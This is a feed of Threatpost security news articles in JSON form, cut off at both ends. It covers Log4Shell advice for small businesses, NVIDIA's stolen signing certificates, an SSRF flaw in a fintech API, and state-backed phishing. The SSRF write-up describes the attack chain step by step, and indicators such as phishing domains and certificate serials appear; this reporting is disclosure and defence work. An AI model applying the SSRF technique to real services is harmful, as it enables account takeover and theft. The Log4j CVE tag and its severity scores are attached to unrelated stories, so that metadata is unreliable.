I\u2019d also confirm any vendors\u2019 exposure and incident management around log4j patching and response.\n\n_According to __[Microsoft\u2019s recent blog](<https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/>)__, the log4j 2 library is included in widely deployed Apache products including Struts 2, Solr, Druid, Flink and Swift. SMBs that have built applications with these products should conduct a code audit to determine if the vulnerable version of log4j is in use._\n\n**Mitiga\u2019s Maor:** SMBs should set up an immediate task force to map all affected homegrown systems and patch them, while allowing IT to map all external systems and communicate with the censored systems.\n\n**Anchore\u2019s Bressers: **This vulnerability is going to be especially challenging for small and medium business users without a dedicated security team. Ideally software vendors are being proactive in their investigations and updates and are contacting affected customers, but this is not always the case.\n\nDepending on the level of technical acumen an organization has, there are steps that can be taken to detect and resolve the issue themselves. There are various open-source tools that exist to help detect this vulnerability on systems such as [Syft and Grype](<https://www.infoworld.com/article/3644492/how-to-detect-the-log4j-vulnerability-in-your-applications.html>). CISA has [released guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) regarding this vulnerability, including steps a business can take.\n\n**Lacework\u2019s Nunnikhoven: **\u201cWhile IT knowledge is required, the basic steps don\u2019t require a security team. IT teams should be trying to find systems that use log4j in their environment and then apply one of the techniques the fantastic team of volunteers with the log4j project have published or the recommended guidance from that system\u2019s vendors. 
This is a lot of work but it\u2019s necessary to reduce the risk to your business.\n\n_The log4j team\u2019s resource is __[available here](<https://logging.apache.org/log4j/2.x/security.html>), in the mitigation section under the \u201cFixed in Log4j 2.15.0\u201d heading._ _Many organizations have also published free tools to help identify vulnerable applications, [like this one](<https://about.sourcegraph.com/blog/log4j-log4shell-0-day/>), [this one](<https://log4j-tester.trendmicro.com/>) or [this one](<https://github.com/hillu/local-log4j-vuln-scanner>)._\n\n**Invicti\u2019s Adam Goodman: **It\u2019s a nightmare of a problem if you have a surplus of Java applications deployed everywhere, not just on the primary website. Organizations should immediately determine where and how they directly or indirectly use this library and then take steps to mitigate the vulnerability by either upgrading the library or modifying Java system properties to disable the vulnerable functionality.\n\nAim to ensure that all applications have limited outbound internet connectivity, and use Ansible scripts or adequate security tools to scan _en masse_ for the vulnerability before forcibly patching it. It\u2019s crucial to use security tools that target all of the applications they can find so that organizations have a more accurate window into their security posture.\n\nOrganizations that lack sufficient budget to invest in discovery tools should make a list of Java applications which they add to continually, and check them off, while prioritizing apps that present the most risk if exploited.\n\n## What Happens if an SMB Uses an MSP?\n\n**Anchore\u2019s Bressers: **I would expect an MSP to take the lead on this issue for their customers. An MSP should be monitoring their infrastructure for indicators of compromise, applying workarounds when possible, and updating the managed applications as vendor updates become available. 
Any business using MSP services should reach out to their provider and request a status update on Log4Shell.\n\n**Ryan Weeks, CISO at Datto:** \u201cCyber-threats are always prevalent. Especially for small to medium-sized businesses (SMBs) \u2013 [78 percent](<https://www.datto.com/resources/dattos-2020-global-state-of-the-channel-ransomware-report>) of MSPs reported attacks against their client SMBs in the last two years alone. MSPs have a responsibility to diligently check for vulnerabilities and arm their customers with the tools to combat them. It\u2019s not enough to simply install routine software updates. SMBs need to ensure their partners proactively push out security updates for any affected products, and continually monitor for potential exploits.\u201d\n\n**Invicti\u2019s Adam Goodman:** This is an issue front-and-center in the security community and if an organization is using an MSP, it\u2019s highly likely that MSP is actively working on this. Confirm that a ticket and incident are open for this vulnerability, and ask the MSP for a list of managed applications that are under remediation. It\u2019s vital to review that list of apps for anything that\u2019s missing, including any back-office or forgotten tools in the mix. Ensure the MSP has visibility into the attack surface so that you both can better handle necessary containment steps moving forward.\n\n**Lacework\u2019s Nunnikhoven:** A managed service provider can help update and fix the systems they manage. A managed security service provider can help detect and stop attacks aimed at this issue, and help investigate any attacks that may have already taken place. The first step in both cases is speaking with your MSP/MSSP to understand the steps they are taking to help protect their customers.\n\n## What Applications Should SMBs Worry About?\n\n**Mitiga\u2019s Maor:** Impact can vary significantly as many custom-developed and off-the-shelf products are impacted. 
Many adversaries are using the vulnerability as part of mass-scanning efforts to identify vulnerable systems. Likewise, some known malware strains have already incorporated exploitation of this vulnerability into their spreading mechanisms. Any Java application might be affected.\n\n**Invicti\u2019s Adam Goodman:** \u201cSMBs should address worries and concerns based on business risk. Internet-facing apps should receive immediate priority, followed by applications that are critical to the software supply chain or back-office and financial applications. There is also an excellent effort from the security community to compile all affected technologies; [it can be found here](<https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592>).\u201d\n\n**ESET\u2019s L\u00e9veill\u00e9:** As a first step, SMBs should ask questions of the organization providing their internet-facing services such as their website. Then they should see if any of their applications use log4j to generate logs. Java applications and webservices would be the first to look at because log4j is a Java library.\n\n**Cybereason\u2019s Striem-Amit:** The world of Java and open source has so many dependencies, where a company might use one product, but it actually carries with it a dozen other libraries. So log4j could be present even though a company might not necessarily even be aware or \u2026 done it directly. So the scanning and the analysis is severely complex. And you have to go in each one of your servers and see, are we using log4j either directly or indirectly in that environment.\n\n## How Can SMBs Remediate a Successful Log4Shell Attack?\n\n**Mitiga\u2019s Maor:** Thankfully, there\u2019s a lot that can be done to harden environments. For customers with internally developed applications, limiting outbound internet connections from servers to only whitelisted hosts is a great step, if challenging to implement. 
Likewise, a variety of cybersecurity companies have listed steps that can be taken to harden vulnerable versions of log4j if upgrades can\u2019t be performed readily. Similarly, exploitation of this vulnerability and many others can be caught using typical compromise assessment techniques. It pays to threat hunt! Remediation is no different than recovering from any other type of RCE vulnerability.\n\n**Lacework\u2019s Nunnikhoven:** \u201cRemediation of this issue will depend on where you find log4j. If it\u2019s in something you\u2019ve written, you can update the library or turn off the vulnerable feature. For commercial software and services, you\u2019re reliant on the vendor to resolve the issue. While that work is ongoing, monitoring your network for attack attempts is reasonably straightforward\u2026if you have the security controls in place.\n\nLacework Labs has published [a detailed technical post](<https://www.lacework.com/blog/lacework-labs-identifies-log4j-attackers/>) on some of the attack techniques currently in use. Expect more variants as cybercriminals develop more techniques to avoid various security controls and other mitigation.\n\nIn situations like this it\u2019s important to understand that until the root cause has been resolved (log4j updated or the feature in question turned off), attackers will continue to work to evade any mitigations that defenders put in place to stop them.\u201d\n\n**Anchore\u2019s Bressers:** An organization without an incident-management team on staff should reach out to an incident-management consulting group. There are a number of important steps that should happen when investigating any cybersecurity attack, successful or not, that can require preserving evidence, recovering data, and protecting employees and users. This is a serious vulnerability with serious consequences. 
It\u2019s one of the worst we have seen in recent history because of its ease of exploitability, far-reaching impacts and powerful nature.\n\n## Final Thoughts\n\n**Datto\u2019s Weeks:** Scenarios such as the log4j vulnerability underscore the importance of proactivity in security. While many are now scrambling to address the vulnerability with patches, it\u2019s equally important to plan for subsequent attacks. Fortunately, there are solutions that can apply known workarounds for vulnerable instances.\n\n**HackerOne\u2019s Ockers:** As a best practice, I recommend all businesses have a clear understanding of the software used within their own systems. Even more important for SMBs in this instance \u2014 businesses should also have a clear understanding of the licensing agreements and security policies of any software vendors or service providers. This level of visibility lets security and IT teams quickly understand where they\u2019re at risk if, and when, something like this is exploited.\n\n**ESET\u2019s L\u00e9veill\u00e9:** SMBs should verify if there were any successful attempts to exploit the vulnerability by looking at their logs.\n\n**HackerOne\u2019s Ockers:** SMBs and larger organizations alike will be affected. As we\u2019re seeing, exploitation will continue to be widespread \u2013 this means it\u2019s particularly important that SMBs check if vendors are still using the vulnerable version of log4j to process user-controlled or otherwise untrusted data. And, if so, SMBs should also ask vendors if their data is stored or processed in the same exposed environment.\n\n**Cybereason\u2019s Striem-Amit:** I think at the end of the day, really prioritize the most internet-facing environments, and rely on your service providers as much as they can to assist you with other patching. You\u2019re welcome to use [our vaccine](<https://threatpost.com/patching-time-log4j-exploits-vaccine/177017/>) to buy time. 
It does work remarkably well to make sure that, between now and when you actually end up patching the server, you\u2019re kind of secure.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-14T17:54:47", "type": "threatpost", "title": "What the Log4Shell Bug Means for SMBs: Experts Weigh In", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", 
"baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T17:54:47", "id": "THREATPOST:76A5549135F9D578FFC2C8FACC135193", "href": "https://threatpost.com/log4shell-bug-smbs-experts/177021/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-07T21:13:09", "description": "Two of NVIDIA\u2019s code-signing certificates were part of the Feb. 23 Lapsus$ Group ransomware attack the company suffered \u2013 certificates that are now being used to sign malware so malicious programs can slide past security safeguards on Windows machines.\n\nThe Feb. 23 attack saw 1TB of data bleed from the graphics processing units (GPUs) maker: a haul that included data on hardware schematics, firmware, drivers, email accounts and password hashes for more than 71,000 employees, and more.\n\nSecurity researchers [noted](<https://twitter.com/cyb3rops/status/1499514240008437762>) last week that malicious binaries were being signed with the stolen certificates to come off like legitimate NVIDIA programs, and that they had appeared in the malware sample database VirusTotal.\n\nThe signed binaries were detected as [Mimikatz](<https://threatpost.com/nefilim-ransomware-ghost-account/163341/>) \u2013 a tool for lateral movement that allows attackers to enumerate and view the credentials stored on the system \u2013 and for other malware and hacking tools, including [Cobalt Strike](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) beacons, backdoors and remote access trojans (RATs) (including a [Quasar RAT](<https://threatpost.com/chinese-spy-group-malware-loaders/145093/>) [[VirusTotal](<https://www.virustotal.com/gui/file/065077fa74c211adf9563f00e57b5daf9594e72cea15b1c470d41b756c3b87e1>)] and a Windows driver 
[[VirusTotal](<https://www.virustotal.com/gui/file/2f578cb0d97498b3482876c2f356035e3365e2c492e10513ff4e4159eebc44b8/detection>)]).\n\n> Gist that contains [@virustotal](<https://twitter.com/virustotal?ref_src=twsrc%5Etfw>) Enterprise search queries to find samples signed with the leaked NVIDIA certificates [#NvidiaLeaks](<https://twitter.com/hashtag/NvidiaLeaks?src=hash&ref_src=twsrc%5Etfw>) [#LAPSUS](<https://twitter.com/hashtag/LAPSUS?src=hash&ref_src=twsrc%5Etfw>)\n> \n> based on my and [@GossiTheDog](<https://twitter.com/GossiTheDog?ref_src=twsrc%5Etfw>)'s work\n> <https://t.co/JxnbrLSjVz> [pic.twitter.com/KYRKdYcF8R](<https://t.co/KYRKdYcF8R>)\n> \n> \u2014 Florian Roth \u26a1\ufe0f (@cyb3rops) [March 5, 2022](<https://twitter.com/cyb3rops/status/1500091665595387909?ref_src=twsrc%5Etfw>)\n\n## Expired But Still Recognized Certs: A \u2018Significant Threat\u2019\n\nBoth of the stolen NVIDIA code-signing certificates are expired, but they\u2019re still recognized by Windows, which allows a driver signed with the certificates to be loaded in the operating system, according to [reports](<https://www.bleepingcomputer.com/news/security/malware-now-using-nvidias-stolen-code-signing-certificates/>).\n\nAccording to security researchers [Kevin Beaumont](<https://twitter.com/GossiTheDog>) and [Will Dormann](<https://twitter.com/wdormann>), the stolen certificates use these serial numbers:\n\n * 43BB437D609866286DD839E1D00309F5\n * 14781bc862e8dc503a559346f5dcc518\n\nCasey Bisson, head of product and developer relations at code-security product provider BluBracket, called the certificate theft a \u201csignificant threat.\u201d\n\n\u201cSigning certificates are the keys computers use to verify trust in software,\u201d he told Threatpost via email on Monday. 
\u201cValidating code signatures is a critical step in securing the global code supply chain, and it protects everybody from average consumers running Windows Updates (where signatures are validated automatically) to developers using software components in larger projects (where signatures are hopefully checked as part of the CI process).\u201d\n\nMike Parkin, senior technical engineer at enterprise cyber risk remediation provider Vulcan Cyber, agreed that malware authors being able to use legitimate certificates to sign their code \u201ccan have far-reaching consequences.\u201d\n\nThe dire situation is somewhat mitigated due to the stolen certificates having expired, he said in an email on Monday, but that\u2019s not a perfect solution. \u201cThis will make it easier for anti-malware applications to identify malicious code signed with these certs, but there is still the challenge of Microsoft\u2019s operating systems accepting them as valid even past their expiration,\u201d he said.\n\n## Supply Chain\n\nBisson noted that given NVIDIA\u2019s massive install base \u2013 its technology shows up everywhere from gaming to crypto miners to industrial and scientific super-computing \u2013 a supply chain attack targeting users could have \u201cenormous implications.\u201d\n\nHe pointed to global power consumption as one yardstick of how NVIDIA\u2019s hardware is slathered across the world: \u201cSome estimates peg crypto as consuming over half a percent of the world\u2019s annual electric generation on its own,\u201d he said, \u201cmost of that related to power-hungry Nvidia processors dependent on Nvidia\u2019s software signed by these keys.\u201d\n\nNVIDIA\u2019s hardware is critical for gaming and media production, as well as cloud-based artificial intelligence (AI) and machine-learning (ML) that powers everything from voice assistants and image and video processing (including automated moderation) to manufacturing quality control systems, Bisson pointed out.\n\nHe 
suggested that the fix for supply-chain threats is to establish a new chain of trust in NVIDIA\u2019s software development workflow with new certificates. \u201cUpstream certificate authorities can revoke Nvidia\u2019s old certificates to block installation of any potentially compromised software with those certificates,\u201d he explained. \u201cAs always, intrusion detection and access control audits are critical to preventing new intrusion attacks, while enforcing signed commits and continuous automated code scanning for secrets, dependency vulnerabilities, along with manual testing are solid steps to ensuring the security of their software.\u201d\n\n## How to Block the Signed Malware\n\nDavid Weston, director of enterprise and OS security at Microsoft, [tweeted](<https://twitter.com/dwizzzleMSFT/status/1499527802382471188?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1499527802382471188%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fwww.bleepingcomputer.com%2Fnews%2Fsecurity%2Fmalware-now-using-nvidias-stolen-code-signing-certificates%2F>) on Thursday that admins can keep Windows from loading known, vulnerable drivers by configuring [Windows Defender Application Control policies](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/select-types-of-rules-to-create>) to control which of NVIDIA\u2019s drivers can be loaded.\n\nThat should, in fact, be admins\u2019 first choice, he wrote.\n\n> WDAC policies work on both 10-11 with no hardware requirements down to the home SKU despite some FUD misinformation I have seen so it should be your first choice. 
Create a policy with the Wizard and then add a deny rule or allow specific versions of Nvidia if you need\n> \n> \u2014 David Weston (DWIZZZLE) (@dwizzzleMSFT) [March 3, 2022](<https://twitter.com/dwizzzleMSFT/status/1499527802382471188?ref_src=twsrc%5Etfw>)\n\nDavid Weston, Microsoft vice president for OS Security and Enterprise, went on to [tweet](<https://twitter.com/dwizzzleMSFT/status/1499528020410781710>) the attributes to be blocked or allowed.\n\n> These are all the attributes you can block or allow on: [pic.twitter.com/3BV3QoMuMX](<https://t.co/3BV3QoMuMX>)\n> \n> \u2014 David Weston (DWIZZZLE) (@dwizzzleMSFT) [March 3, 2022](<https://twitter.com/dwizzzleMSFT/status/1499528020410781710?ref_src=twsrc%5Etfw>)\n\nUnfortunately, Microsoft\u2019s WDAC fix isn\u2019t a practical solution for the majority of Windows users, who aren\u2019t technically literate, Vulcan Cyber\u2019s Parkin pointed out.\n\nA better approach would be for Microsoft to recognize the certificates as expired and no longer accept them as legitimate, he told Threatpost.\n\n## Doxxed Emails, Password Hashes & More\n\nOn Feb. 27, Lapsus$ claimed that it had been in NVIDIA\u2019s systems for a week, that the gang isn\u2019t state-sponsored and that it\u2019s \u201cnot into politics AT ALL\u201d \u2013 a clarification that\u2019s apparently important for cybercrooks now that the Russia/Ukraine [cyber war zone](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>) is burning at fever pitch.\n\nLast Wednesday, March 2, the compromised-email notice site Have I Been Pwned put up an [alert](<https://haveibeenpwned.com/PwnedWebsites#NVIDIA>) regarding 71,335 NVIDIA employees\u2019 emails and NTLM password hashes having been leaked on Feb. 
23, \u201cmany of which were subsequently cracked and circulated within the hacking community.\u201d\n\nAs has been [noted](<https://www.theverge.com/2022/3/4/22962217/nvidia-hack-lapsus-have-i-been-pwned-email-breach-password>), at least on the face of it, that number of 71,000 compromised employee accounts \u2013 a number that the graphics processing units maker hasn\u2019t confirmed or denied \u2013 doesn\u2019t make sense. In its most recent quarterly report ([PDF](<https://s22.q4cdn.com/364334381/files/doc_downloads/2021/04/2021-Annual-Review.pdf>)), NVIDIA only listed a workforce of 18,975.\n\nBut, given that the Telegraph\u2019s initial [report](<https://www.telegraph.co.uk/business/2022/02/25/us-microchip-powerhouse-nvidia-hit-cyber-attack/>) cited an insider who said that the intrusion \u201ccompletely compromised\u201d the company\u2019s internal systems, it could be that the stolen data included former employees.\n\nLapsus$ released a portion of the highly confidential stolen data, including source codes, GPU drivers and documentation on NVIDIA\u2019s fast logic controller product, also known as Falcon and Lite Hash Rate, or LHR GPU.\n\nLapsus$ demanded $1 million and a percentage of an unspecified fee from NVIDIA for the Lite Hash Rate bypass.\n\nLapsus$ also demanded that NVIDIA open-source its drivers, lest Lapsus$ do it itself.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/07123426/Lapsus-threat.jpg>)\n\n## Who Is Lapsus$ Group?\n\nLapsus$ Group emerged last year. 
It\u2019s probably best known [for its December attack](<https://www.zdnet.com/article/brazilian-ministry-of-health-suffers-cyberattack-and-covid-19-vaccination-data-vanishes/>) on the Brazil Ministry of Health that took down several online entities, successfully wiping out information on citizens\u2019 COVID-19 vaccination data as well as disrupting the system that issues digital vaccination certificates.\n\nIn January, Lapsus$ also [crippled](<https://threatpost.com/portuguese-media-giant-impresa-ransomware/177323/>) the Portuguese media giant Impresa.\n\nLapsus$ also recently released what is purportedly a [massive dump](<https://betanews.com/2022/03/06/lapsus-hackers-leak-samsung-source-code-and-massive-data-dump-from-security-breach/>) of proprietary source code [stolen](<https://threatpost.com/samsung-lapsus-ransomware-source-code/178791/>) from Samsung, vx-underground [reported](<https://twitter.com/vxunderground/status/1499882337957515274>).\n\n030722 16:06 UPDATE: Added commentary from Casey Bisson and Mike Parkin.\n\n_Register Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** scheduled for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. 
[Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype._\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-07T17:46:39", "type": "threatpost", "title": "NVIDIA\u2019s Stolen Code-Signing Certs Used to Sign Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-07T17:46:39", "id": "THREATPOST:1309DBA0F8A2727965C6FA284A002D3B", "href": "https://threatpost.com/nvidias-stolen-code-signing-certs-sign-malware/178784/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-07T13:47:15", "description": "A [server-side request forgery (SSRF) flaw](<https://threatpost.com/microsoft-azure-flaws-servers-takeover/159965/>) in an API of a large financial technology (fintech) platform potentially could have compromised millions of bank customers, allowing attackers to defraud clients by controlling their bank accounts and funds, researchers have found.\n\nA team at [Salt Security\u2019s](<https://salt.security/>) [Salt Labs](<https://salt.security/blog-authors/salt-labs>) identified the 
vulnerability in an API in a web page that supports the organization\u2019s platform fund transfer functionality, which allows clients to transfer money from their accounts on its platform into their bank accounts, researchers disclosed in [a report published Thursday](<https://salt.security/blog/api-threat-research-server-side-request-forgery-on-fintech-platform-enabled-administrative-account-takeover>).\n\nThe company in question\u2014dubbed \u201cAcme Fintech\u201d to preserve its anonymity\u2013offers a \u201cdigital transformation\u201d service for banks of all sizes, allowing the institutions to switch traditional banking services to online services. The platform already has been actively integrated into many banks\u2019 systems and thus has millions of active daily users, researchers said.\n\nIf the flaw had been exploited, attackers could have performed various nefarious activities by gaining administrative access to the banking system using the platform. From there they could have leaked users\u2019 personal data, accessed banking details and financial transactions, and performed unauthorized fund transfers into their own bank accounts, researchers said.\n\nUpon identifying the vulnerability, researchers reviewed their findings and provided recommended mitigation to the organization, they said.\n\n## **High Reward for Threat Actors**\n\nAPI flaws are often overlooked, but researchers at Salt Labs said in the report that they \u201csee vulnerabilities like this one and other API-related issues on a daily basis.\u201d\n\nIndeed, 5 percent of organizations experienced an API security incident in the past 12 months, according to the company\u2019s [State of API Security](<https://salt.security/api-security-trends?>) report for the first quarter of 2022. 
This period also showed significant growth of malicious API traffic, they said.\n\n\u201c[Critical SSRF flaws](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) are more common than many FinTech providers and banking institutions realize,\u201d Yaniv Balmas, vice president of research for Salt Security said in a press statement. \u201cAPI attacks are becoming more frequent and complex.\u201d\n\nFintech companies are especially vulnerable to compromise because their customers and partners rely on a vast network of APIs to drive interactions between various websites, mobile applications and custom integrations, among other systems, researchers said.\n\nThis, in turn, makes them \u201cprime targets by attackers looking to abuse API vulnerabilities\u201d for a couple of reasons, researchers wrote.\n\n\u201cOne, their API landscape and overall functionality is very rich and complex, which leaves a lot of room for mistakes or overlooking details in development,\u201d they wrote. \u201cTwo, if a bad actor can successfully abuse this type of platform, the potential profits are huge, since it could allow control of millions of users\u2019 bank accounts and funds.\u201d\n\n## **The Vulnerability**\n\nResearchers discovered the flaw while scanning and recording all traffic sent and received across the organization\u2019s website. 
On a page that connects clients to various banks so they can transfer funds to their bank accounts, researchers discovered an issue with the API the browser calls to handle the request.\n\n\u201cThis specific API is using the endpoint located at \u2018/workflows/tasks/{TASK_GUID}/values,\u2019 the HTTP method used to call it is PUT, and the specific request data is sent in the HTTP body section,\u201d researchers explained.\n\nThe request body also carries a JWT Bearer token, which is a cryptographically signed key that lets the server know who the requesting user is and what permissions they have.\n\nThe flaw was in the request parameters that send the required data for a funds transfer\u2014specifically a parameter called \u201cInstitutionURL,\u201d researchers explained. This is a user-provided value that includes a URL pointing to some GUID value placed on the receiving bank website.\n\nIn this case, the bank\u2019s web server handled the user-supplied URL by trying to contact the URL itself, allowing for an SSRF in which the web server still tried to call an arbitrary URL if it was inserted into the parameter instead of the appropriate bank\u2019s URL, researchers explained.\n\n## **Exposing the SSRF Flaw**\n\nResearchers demonstrated this flaw by forging a malformed request containing their own domain. The connection coming into their server was made successfully, proving that \u201cthe server blindly trusts domains provided to it in this parameter and issues a request to that URL,\u201d they wrote.\n\nFurther, the request that came into their server included a JWT token used for authentication, which turned out to be a different one than the token included in the original request.\n\nResearchers embedded the new JWT token into a request they\u2019d previously encountered to an endpoint named \u201c/accounts/account,\u201d which had allowed them to retrieve information from a bank account. 
This time they returned even more information, they said.\n\n\u201cThe API endpoint recognized our new JWT administrative token and very gracefully returned a list of every user and its details across the platform,\u201d researchers revealed.\n\nTrying the request again to an endpoint named \u201c/transactions/transactions\u201d with the new token also allowed them to access a list of all transactions made by every user on the banking system, they said.\n\n\u201cThis vulnerability is a critical flaw, one that completely compromises every bank user,\u201d researchers said. \u201cHad bad actors discovered this vulnerability, they could have caused serious damage for both [the organization] and its users.\u201d\n\nSalt Labs hopes that shining a light on API threats will inspire security practitioners to take a closer look at how their systems may be vulnerable in this way, Balmas said.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-07T13:46:17", "type": "threatpost", "title": "SSRF Flaw in Fintech Platform Allowed for Compromise of Bank Accounts", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2021-44228"], "modified": "2022-04-07T13:46:17", "id": "THREATPOST:B7C8B7F3016D73355C4ED5E05B0E8490", "href": "https://threatpost.com/ssrf-flaw-fintech-bank-accounts/179247/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-09T15:37:46", "description": "While Russia is fighting a physical war on the ground against Ukraine, advanced persistent threat (APT) groups affiliated with or backing Vladimir Putin\u2019s government are ramping up phishing and other attacks against Ukrainian and European targets in cyberspace, Google is warning.\n\nResearchers from Google\u2019s Threat Analysis Group (TAG) have seen an increase in activity ranging \u201cfrom espionage to phishing campaigns\u201d from threat groups known as FancyBear/APT28 and Ghostwriter/UNC1151, Shane Huntley, director of software engineering at Google TAG, wrote in a [blog post](<https://blog.google/threat-analysis-group/update-threat-landscape-ukraine/>) published Monday. The former has been attributed to Russia\u2019s GRU intelligence agency, and the latter is an actor that Ukraine previously said is part of the Belarusian Ministry of Defense.\n\nMeanwhile, there have been a recent spate of distributed denial-of-service (DDoS) attacks against Ukrainian government sites, such as the Ministry of Foreign Affairs and the Ministry of Internal Affairs, as well as key services that help Ukrainians find information, such as Liveuamap, according to Google TAG.\n\nChina\u2019s Mustang Panda also has joined the fray, using the war in Ukraine to target European entities with lures related to the Ukrainian invasion in a recent phishing campaign. 
China\u2019s government is one of the few around the world backing Putin in the conflict.\n\n\u201cWe\u2019re sharing this information to help raise awareness among the security community and high risk users,\u201d Huntley wrote in the post.\n\n## **Phishing Flurry**\n\nFancy Bear, the APT behind attacks against the [2020 Tokyo Olympics](<https://threatpost.com/cyberattacks-sporting-anti-doping-orgs-as-2020-olympics-loom/149634/>) and [elections in the European Union](<https://threatpost.com/cybercriminals-impersonate-russian-apt-fancy-bear-to-launch-ddos-attacks/149578/>), most recently has been targeting users of ukr.net \u2013 owned by the Ukrainian media company URKNet \u2013 with \u201cseveral large credential phishing campaigns,\u201d Huntley wrote.\n\n\u201cThe phishing emails are sent from a large number of compromised accounts (non-Gmail/Google), and include links to attacker controlled domains,\u201d according to the post.\n\nIn two recent campaigns, TAG saw attackers using newly created Blogspot domains as the initial landing page, which then redirected targets to credential phishing pages. At this time, all known attacker-controlled Blogspot domains have been taken down, Huntley added.\n\nMeanwhile, Ghostwriter has conducted similarly motivated phishing campaigns over the past week against Polish and Ukrainian government and military organizations, according to Google TAG. The group also has been targeting webmail users from the following providers in the region: i.ua, meta.ua, rambler.ru, ukr.net, wp.pl and yandex.ru.\n\nGoogle TAG blocked a number of credential phishing domains that researchers observed during the campaigns through Google Safe Browsing, according to the post. 
Those domains included the following: accounts[.]secure-ua[.]website, i[.]ua-passport[.]top, login[.]creditals-email[.]space, post[.]mil-gov[.]space and verify[.]rambler-profile[.]site.\n\n## **Capitalizing on Conflict**\n\nNot to be outdone, China\u2019s Mustang Panda, aka Temp.Hex**,** HoneyMyte, TA416 or RedDelta, is using phishing lures related to the conflict in the Ukraine to target European organizations.\n\n\u201cTAG identified malicious attachments with file names such as [\u2018Situation at the EU borders with Ukraine.zip\u2019](<https://www.virustotal.com/gui/file/8a7fbafe9f3395272548e5aadeb1af07baeb65d7859e7a1560f580455d7b1fac/>) which contain an executable of the same name that is a basic downloader,\u201d Huntley explained in the post. When executed, the file downloads several additional files that install the final, malicious payload, according to TAG.\n\nWhile Huntley noted that targeted Europe represents a shift for the threat actor \u2013 which typically targets entities in Southeast Asia \u2013 Mustang Panda has been active against EU entities before, most notably targeting Rome\u2019s Vatican and Catholic Church-related organizations with [a spearphishing campaign](<https://threatpost.com/hackers-continue-cyberattacks-against-vatican-catholic-orgs/159306/>) in September 2020.\n\nTo mitigate the APT\u2019s latest phishing attacks, TAG has alerted relevant authorities of its findings, Huntley noted.\n\n## **Expanding DDoS Protection**\n\nAs APTs step up phishing attacks against Ukrainian targets, key government and service-oriented websites in the country also are facing a new barrage of DDoS 